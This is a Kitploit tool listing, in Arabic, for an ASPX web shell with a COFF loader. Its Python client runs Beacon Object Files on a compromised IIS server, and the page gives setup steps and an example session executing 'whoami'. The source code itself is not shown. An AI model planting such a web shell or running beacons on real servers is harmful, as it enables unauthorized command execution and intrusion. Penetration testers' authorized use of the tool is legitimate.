Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ASPX_WebShell_COFFLoader — ASPX web shell مع محمل COFF لتنفيذ Beacon Object Files (BOFs) على الخوادم المستهدفة عبر عميل Python شبه تفاعلي، مصمم لاختبار الاختراق المصرح به. | Kitploit
أدوات/GitHubGitHub/epotseluevskaya/aspx_webshell_coffloader
شيل كوداستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمرتطوير الحمولات
GitHubepotseluevskaya/aspx_webshell_coffloader

ASPX_WebShell_COFFLoader

ASPX web shell مع محمل COFF لتنفيذ Beacon Object Files (BOFs) على الخوادم المستهدفة عبر عميل Python شبه تفاعلي، مصمم لاختبار الاختراق المصرح به.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
134213منذ 6 أشهرتمت المراجعة من قبل Kitploit

قشرة ويب ASPX مع محمّل COFF

مبنية على CS_COFFLoader من TrustedSec

الوصف

تمكن قشرة الويب ASPX هذه من تنفيذ ملفات كائنات المنارة (BOFs) على خادم مستهدف باستخدام عميل بايثون شبه تفاعلي.

تستفيد من تنفيذ محمّل COFF المستمد من CS_COFFLoader من TrustedSec.

هذا المشروع مخصص بشكل صارم للبحث الأمني واختبار الاختراق المصرح به. باستخدام هذا المشروع، أنت توافق على الامتثال لجميع القوانين واللوائح المعمول بها.

المتطلبات الأساسية

قبل الاستخدام، ستحتاج إلى:

  1. ترجمة beacon_compatibility.c من https://github.com/trustedsec/CS_COFFLoader/tree/main/beacon_object، واستبدال العنصر النائب {{BEACON_DATA}} في ملف ASPX بملف الكائن المشفر بـ Base64.

  2. ترجمة ملفات BOF الخاصة بك، على سبيل المثال، من https://github.com/trustedsec/CS-Situational-Awareness-BOF، وتحديد المسار إلى الدليل الذي يحتوي على ملفات BOF المترجمة في عميل الويب.

الاستخدام

root@kitploit:~
python3 webshell_bof_client.py http://1.2.3.4/bof.aspx
[*] ASPX Web Shell With COFF Loader Client
[*] Target: http://1.2.3.4/bof.aspx
[*] Beacons: /usr/share/beacons
[*] Type 'help' for available commands.

bof> help

Client for ASPX Web Shell with COFF Loader
Based on TrustedSec's COFFLoader: https://github.com/trustedsec/COFFLoader/tree/main
Author: Eugenie Potseluevskaya
    
For security research and authorized penetration testing only.
Use strictly on systems you own or have explicit written permission to test.
Unauthorized use is illegal and the author assumes no liability for misuse or damages resulting from this code.
    
Available commands:
  help
      Show this message.

  list
      List available beacons in the beacons directory.

  exec <beacon_name> [format_string [arg1 arg2 ...]]
      Execute a beacon against the server.

      beacon_name   Name of the beacon subdirectory.
      format_string bof_pack format string (b/i/s/z/Z). Omit if no args needed.
      arg1 arg2 ... Arguments matching the format string.

      Examples:
        exec whoami
        exec mybeacon z "hello world"
        exec mybeacon zi "some string" 42
        exec mybeacon zZ "str1" "widestr"

  exit
      Quit the client.

bof> exec whoami
[*] Sending 'whoami' (x64) to http://1.2.3.4/bof.aspx ...

── Output ──────────────────────────────────────

UserName		SID
====================== ====================================
IIS APPPOOL\DefaultAppPool	S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415

....
تنزيل الأداة